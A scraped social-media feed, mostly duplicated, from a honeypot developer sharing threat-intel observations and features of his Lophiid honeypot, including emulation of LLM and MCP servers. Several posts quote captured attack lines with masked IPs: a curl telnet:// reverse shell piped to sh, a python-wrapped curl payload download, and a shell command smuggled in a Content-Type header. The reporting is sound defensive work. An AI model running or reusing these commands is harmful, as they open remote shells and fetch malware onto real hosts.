Niels Heinen
@heinen.bsky.social
Security tooling at scale | honeypot dev
My honeypots saw the first Agent2Agent (A2A) Protocol scan this week. I'll make work to add proper A2A simulation to Lophiid next week. It'll emulate an agent that offers code execution services ;-)
Is it worth the effort ?
#honeypot #dfir #a2a #cybersecurity #infosec #aisecurity #mcp
Is it worth the effort ?
#honeypot #dfir #a2a #cybersecurity #infosec #aisecurity #mcp
November 16, 2025 at 3:28 PM
My honeypots saw the first Agent2Agent (A2A) Protocol scan this week. I'll make work to add proper A2A simulation to Lophiid next week. It'll emulate an agent that offers code execution services ;-)
Is it worth the effort ?
#honeypot #dfir #a2a #cybersecurity #infosec #aisecurity #mcp
Is it worth the effort ?
#honeypot #dfir #a2a #cybersecurity #infosec #aisecurity #mcp
I'm always appreciative of scripts using /dev/tcp to fetch payloads (versus the thousands wget/curl payloads I see daily)
#honeypot #dfir #infosec #cybersecurity #threatintel
#honeypot #dfir #infosec #cybersecurity #threatintel
November 14, 2025 at 5:00 PM
I'm always appreciative of scripts using /dev/tcp to fetch payloads (versus the thousands wget/curl payloads I see daily)
#honeypot #dfir #infosec #cybersecurity #threatintel
#honeypot #dfir #infosec #cybersecurity #threatintel
One attacker was hammering my LLM honeypots (ollama/llama.cpp) with requests for the AI to identify what service a secret key is for.
I bet the keys they are sending were also collected with AI and lack enough context for them to abuse them.
#infosec #honeypot #llm #aisecurity #dfir
I bet the keys they are sending were also collected with AI and lack enough context for them to abuse them.
#infosec #honeypot #llm #aisecurity #dfir
November 5, 2025 at 3:12 PM
One attacker was hammering my LLM honeypots (ollama/llama.cpp) with requests for the AI to identify what service a secret key is for.
I bet the keys they are sending were also collected with AI and lack enough context for them to abuse them.
#infosec #honeypot #llm #aisecurity #dfir
I bet the keys they are sending were also collected with AI and lack enough context for them to abuse them.
#infosec #honeypot #llm #aisecurity #dfir
Here are my notes on a recent attack that utilizes swarms of exposed AI instances to attack hosts.
medium.com/@niels.heine...
#infosec #dfir #cybersecurity #honeypot #aisecurity #llm
medium.com/@niels.heine...
#infosec #dfir #cybersecurity #honeypot #aisecurity #llm
You are worker #41: Lophiid Honeypot Caught an Automated AI Attack Swarm
The setup
medium.com
November 2, 2025 at 2:15 PM
Here are my notes on a recent attack that utilizes swarms of exposed AI instances to attack hosts.
medium.com/@niels.heine...
#infosec #dfir #cybersecurity #honeypot #aisecurity #llm
medium.com/@niels.heine...
#infosec #dfir #cybersecurity #honeypot #aisecurity #llm
Attacker asks my Lophiid LLM honeypot to evaluate whether an unprotected ETH wallet is a honeypot and possibly monitored ;)
#dfir #infosec #honeypot #llm #aisecurity
#dfir #infosec #honeypot #llm #aisecurity
November 1, 2025 at 4:00 PM
Attacker asks my Lophiid LLM honeypot to evaluate whether an unprotected ETH wallet is a honeypot and possibly monitored ;)
#dfir #infosec #honeypot #llm #aisecurity
#dfir #infosec #honeypot #llm #aisecurity
My Lophiid llama.cpp honeypot is catching some nice requests today. "Analyze if this cryptocurrency node is REAL or FAKE (honeypot/trap)" and many more like for specific vulns.
All targeting IP port combos that appear to be attacker controlled.
#honeypot #dfir #infosec #llamacpp #aisecurity
All targeting IP port combos that appear to be attacker controlled.
#honeypot #dfir #infosec #llamacpp #aisecurity
October 31, 2025 at 3:59 PM
My Lophiid llama.cpp honeypot is catching some nice requests today. "Analyze if this cryptocurrency node is REAL or FAKE (honeypot/trap)" and many more like for specific vulns.
All targeting IP port combos that appear to be attacker controlled.
#honeypot #dfir #infosec #llamacpp #aisecurity
All targeting IP port combos that appear to be attacker controlled.
#honeypot #dfir #infosec #llamacpp #aisecurity
Reposted by Niels Heinen
Google Cloud Platform was vulnerable to a HTTP desync attack leading to "responses being misrouted between recipients for certain third-party models". Aka your LLM response goes to someone else. The Expect header strikes again!
Context: http1mustdie.com
cloud.google.com/support/bull...
Context: http1mustdie.com
cloud.google.com/support/bull...
Security Bulletins | Customer Care | Google Cloud
cloud.google.com
October 24, 2025 at 1:11 PM
Google Cloud Platform was vulnerable to a HTTP desync attack leading to "responses being misrouted between recipients for certain third-party models". Aka your LLM response goes to someone else. The Expect header strikes again!
Context: http1mustdie.com
cloud.google.com/support/bull...
Context: http1mustdie.com
cloud.google.com/support/bull...
Had some issue where AI was replacing part of command injections with things like
I thought I solved that but was still seeing {{{cmd}}}. After blaming the AI for too long it turned out the attacker was sending a placeholder instead of a real command ;p
#honeypot #dfir #infosec #aisecurity
I thought I solved that but was still seeing {{{cmd}}}. After blaming the AI for too long it turned out the attacker was sending a placeholder instead of a real command ;p
#honeypot #dfir #infosec #aisecurity
October 21, 2025 at 4:28 PM
Had some issue where AI was replacing part of command injections with things like
I thought I solved that but was still seeing {{{cmd}}}. After blaming the AI for too long it turned out the attacker was sending a placeholder instead of a real command ;p
#honeypot #dfir #infosec #aisecurity
I thought I solved that but was still seeing {{{cmd}}}. After blaming the AI for too long it turned out the attacker was sending a placeholder instead of a real command ;p
#honeypot #dfir #infosec #aisecurity
The lophiid honeypot can now also emulate MCP servers. I just added an example of an MCP server that allows commands to be executed (it emulates them via the build-in LLM shell).
github.com/mrheinen/lop...
#mcp #llm #aisecurity #dfir #infosec #honeypot
github.com/mrheinen/lop...
#mcp #llm #aisecurity #dfir #infosec #honeypot
Add MCP honeypot rules by mrheinen · Pull Request #247 · mrheinen/lophiid
User description
This adds rules to emulate an MCP server. The server will provide a service to execute commands. If an attacker tries to execute commands then they are emulated with the LLM shell ...
github.com
October 10, 2025 at 6:43 PM
The lophiid honeypot can now also emulate MCP servers. I just added an example of an MCP server that allows commands to be executed (it emulates them via the build-in LLM shell).
github.com/mrheinen/lop...
#mcp #llm #aisecurity #dfir #infosec #honeypot
github.com/mrheinen/lop...
#mcp #llm #aisecurity #dfir #infosec #honeypot
Just added rules to the Lophiid honeypot to emulate llama.cpp and ollama API's. It's implemented in a way that the first (and only the first) prompt sent to the honeypot gets actually answered with a real LLM response.
github.com/mrheinen/lop...
github.com/mrheinen/lop...
#honeypot #dfir #infosec
github.com/mrheinen/lop...
github.com/mrheinen/lop...
#honeypot #dfir #infosec
Add llama.cpp openai and UI simulation by mrheinen · Pull Request #236 · mrheinen/lophiid
User description
Pretends to be an exposed llama.cpp server. Prompts send to the completions endpoint are answered with a real LLM the first time. Following times are responsed with an echo of the...
github.com
September 27, 2025 at 5:23 PM
Just added rules to the Lophiid honeypot to emulate llama.cpp and ollama API's. It's implemented in a way that the first (and only the first) prompt sent to the honeypot gets actually answered with a real LLM response.
github.com/mrheinen/lop...
github.com/mrheinen/lop...
#honeypot #dfir #infosec
github.com/mrheinen/lop...
github.com/mrheinen/lop...
#honeypot #dfir #infosec
Seeing exploitation of Fiberhome Router SR1041F RP0105 RCE (backdoor?) against my honeypots recently. Pretty insane that this is possible:
gist.github.com/whirleyes/c6...
#honeypot #dfir #infosec
gist.github.com/whirleyes/c6...
#honeypot #dfir #infosec
SR1041F remote code execution
SR1041F remote code execution. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
August 1, 2025 at 3:21 PM
Seeing exploitation of Fiberhome Router SR1041F RP0105 RCE (backdoor?) against my honeypots recently. Pretty insane that this is possible:
gist.github.com/whirleyes/c6...
#honeypot #dfir #infosec
gist.github.com/whirleyes/c6...
#honeypot #dfir #infosec
The sophisticated attacker uses a carefully named loader in their payload to avoid raising suspicion:
x.x.x.x/GODLYBINSNIG...
(found in the payload received by one of my honeypots)
#honeypot #dfir #infosec
x.x.x.x/GODLYBINSNIG...
(found in the payload received by one of my honeypots)
#honeypot #dfir #infosec
April 21, 2025 at 3:50 PM
The sophisticated attacker uses a carefully named loader in their payload to avoid raising suspicion:
x.x.x.x/GODLYBINSNIG...
(found in the payload received by one of my honeypots)
#honeypot #dfir #infosec
x.x.x.x/GODLYBINSNIG...
(found in the payload received by one of my honeypots)
#honeypot #dfir #infosec
Saw this in a payload for an Ivanti RCE that hit one of my Lophiid honeypots. Why execute curl directly if you can also wrap it in python ;-) ;-)
python -c 'import os;os.popen("curl -L -k x.x.x.x:8080/something -o /var/tmp/ivanti.listener ;...... ")
#dfir #honeypot #infosec
python -c 'import os;os.popen("curl -L -k x.x.x.x:8080/something -o /var/tmp/ivanti.listener ;...... ")
#dfir #honeypot #infosec
March 22, 2025 at 4:16 PM
Saw this in a payload for an Ivanti RCE that hit one of my Lophiid honeypots. Why execute curl directly if you can also wrap it in python ;-) ;-)
python -c 'import os;os.popen("curl -L -k x.x.x.x:8080/something -o /var/tmp/ivanti.listener ;...... ")
#dfir #honeypot #infosec
python -c 'import os;os.popen("curl -L -k x.x.x.x:8080/something -o /var/tmp/ivanti.listener ;...... ")
#dfir #honeypot #infosec
These are wordlists collected from bruteforce attacks against Lophiid honeypots:
github.com/mrheinen/wor...
Parsed 8.7 million bruteforce requests resulted in 1.1 million unique username/password combinations.
#infosec #honeypot #dfir #security
github.com/mrheinen/wor...
Parsed 8.7 million bruteforce requests resulted in 1.1 million unique username/password combinations.
#infosec #honeypot #dfir #security
GitHub - mrheinen/wordlists: Username / password wordlists collected using Lophiid honeypots
Username / password wordlists collected using Lophiid honeypots - mrheinen/wordlists
github.com
March 16, 2025 at 6:00 PM
These are wordlists collected from bruteforce attacks against Lophiid honeypots:
github.com/mrheinen/wor...
Parsed 8.7 million bruteforce requests resulted in 1.1 million unique username/password combinations.
#infosec #honeypot #dfir #security
github.com/mrheinen/wor...
Parsed 8.7 million bruteforce requests resulted in 1.1 million unique username/password combinations.
#infosec #honeypot #dfir #security
First time I'm seeing curl being used with telnet:// to fetch a payload. Found in an exploitation of CVE-2023-45852
C='curl -Ns telnet://x.x.x.x:4444'; $C &1 | sh 2>&1 | $C >/dev/null
#dfir #infosec #exploit #honeypot #threatdetection
C='curl -Ns telnet://x.x.x.x:4444'; $C &1 | sh 2>&1 | $C >/dev/null
#dfir #infosec #exploit #honeypot #threatdetection
March 15, 2025 at 6:37 PM
First time I'm seeing curl being used with telnet:// to fetch a payload. Found in an exploitation of CVE-2023-45852
C='curl -Ns telnet://x.x.x.x:4444'; $C &1 | sh 2>&1 | $C >/dev/null
#dfir #infosec #exploit #honeypot #threatdetection
C='curl -Ns telnet://x.x.x.x:4444'; $C &1 | sh 2>&1 | $C >/dev/null
#dfir #infosec #exploit #honeypot #threatdetection
It's just crazy how phpmyadmin mass exploitation remains popular (read: effective) to this day. The only developments I have seen in these exploit attempt is that the list of locations that are checked for phpmyadmin installations gets longer and more creative
#honeypot #dfir #infosec
#honeypot #dfir #infosec
March 15, 2025 at 6:26 PM
These hardcoded and undocumented accounts with the passwords h3ckey don't really give me confidence about the rest of the firmware but we will see ;)
#infosec #reverseengineering #security
#infosec #reverseengineering #security
February 25, 2025 at 7:21 PM
These hardcoded and undocumented accounts with the passwords h3ckey don't really give me confidence about the rest of the firmware but we will see ;)
#infosec #reverseengineering #security
#infosec #reverseengineering #security
Found this, what must be a backdoor, request where the command is given via the Content-Type header.
The command is ": /bin/sh /proc/self/fd/0" and the rest is in the body.
The raw request is in the screenshot below.
Anyone familiar with this ?
#dfir #honeypot #infosec #threatintel
The command is ": /bin/sh /proc/self/fd/0" and the rest is in the body.
The raw request is in the screenshot below.
Anyone familiar with this ?
#dfir #honeypot #infosec #threatintel
February 18, 2025 at 5:22 PM
Found this, what must be a backdoor, request where the command is given via the Content-Type header.
The command is ": /bin/sh /proc/self/fd/0" and the rest is in the body.
The raw request is in the screenshot below.
Anyone familiar with this ?
#dfir #honeypot #infosec #threatintel
The command is ": /bin/sh /proc/self/fd/0" and the rest is in the body.
The raw request is in the screenshot below.
Anyone familiar with this ?
#dfir #honeypot #infosec #threatintel
Can someone confirm, is this exploitation of CVE-2023-22522 ? First time seeing this today.. will create proper rules in Lophiid to start interaction with future exploitation attempts
#honeypot #infosec #threatdetection
#honeypot #infosec #threatdetection
January 31, 2025 at 1:18 PM
Can someone confirm, is this exploitation of CVE-2023-22522 ? First time seeing this today.. will create proper rules in Lophiid to start interaction with future exploitation attempts
#honeypot #infosec #threatdetection
#honeypot #infosec #threatdetection
Added slightly hacky but effective shell script pre-processing to the Lophiid honeypot. It resolves variables and 'for' loops in scripts before the payload link extraction.
Works really well with your typical botnet loader scripts.
github.com/mrheinen/lop...
#honeypot #infosec #threatdetection
Works really well with your typical botnet loader scripts.
github.com/mrheinen/lop...
#honeypot #infosec #threatdetection
Add shell script parsing/expansion for better payload extraction by mrheinen · Pull Request #150 · mrheinen/lophiid
User description
This is quite hacky^H^H special but it works surprisingly well ! This logic will parse shell script, which are typically small loaders with wget calls and a single for loop. The s...
github.com
January 27, 2025 at 6:18 PM
Added slightly hacky but effective shell script pre-processing to the Lophiid honeypot. It resolves variables and 'for' loops in scripts before the payload link extraction.
Works really well with your typical botnet loader scripts.
github.com/mrheinen/lop...
#honeypot #infosec #threatdetection
Works really well with your typical botnet loader scripts.
github.com/mrheinen/lop...
#honeypot #infosec #threatdetection